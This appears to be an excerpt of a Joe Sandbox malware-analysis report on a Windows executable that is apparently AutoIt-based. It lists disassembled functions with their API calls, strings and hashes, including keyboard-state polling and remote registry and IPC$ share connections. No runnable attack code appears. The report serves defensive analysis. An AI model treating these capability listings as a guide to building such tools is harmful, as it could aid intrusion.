                                                                                                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                        Strings
                                                                                                        • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                        • String ID: NULL Pointer assignment
                                                                                                        • API String ID: 440038798-2785691316
                                                                                                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                        Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                        • _wcslen.LIBCMT ref: 004610A3
                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                        • String ID: ThumbnailClass
                                                                                                        • API String ID: 4136854206-1241985126
                                                                                                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                        Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                        • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                        • String ID: 2
                                                                                                        • API String ID: 1331449709-450215437
                                                                                                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                        Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                        • API String ID: 3054410614-2561132961
                                                                                                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                        Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                        • API String ID: 600699880-22481851
                                                                                                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                        Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DestroyWindow
                                                                                                        • String ID: static
                                                                                                        • API String ID: 3375834691-2160076837
                                                                                                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                        Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                        • API String ID: 2907320926-3566645568
                                                                                                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                        Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                        • DeleteObject.GDI32(00550000), ref: 00470A04
                                                                                                        • DestroyIcon.USER32(00650073), ref: 00470A1C
                                                                                                        • DeleteObject.GDI32(528318DF), ref: 00470A34
                                                                                                        • DestroyWindow.USER32(006D0065), ref: 00470A4C
                                                                                                        • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                        • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1237572874-0
                                                                                                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                        Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                        • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                        • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2706829360-0
                                                                                                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                        Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                        • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                        • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                        • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                        • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                        • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: State$Async$Keyboard
                                                                                                        • String ID:
                                                                                                        • API String ID: 541375521-0
                                                                                                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                        Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3413494760-0
                                                                                                        • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                        • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                        Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                        • String ID: AU3_FreeVar
                                                                                                        • API String ID: 2634073740-771828931
                                                                                                        • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                        • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
